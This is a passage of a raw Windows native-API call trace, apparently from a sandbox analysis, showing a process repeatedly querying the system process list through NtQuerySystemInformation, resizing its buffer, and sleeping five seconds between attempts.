[0274.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.985] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.018] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.026] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.032] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.046] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.065] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.072] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.099] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 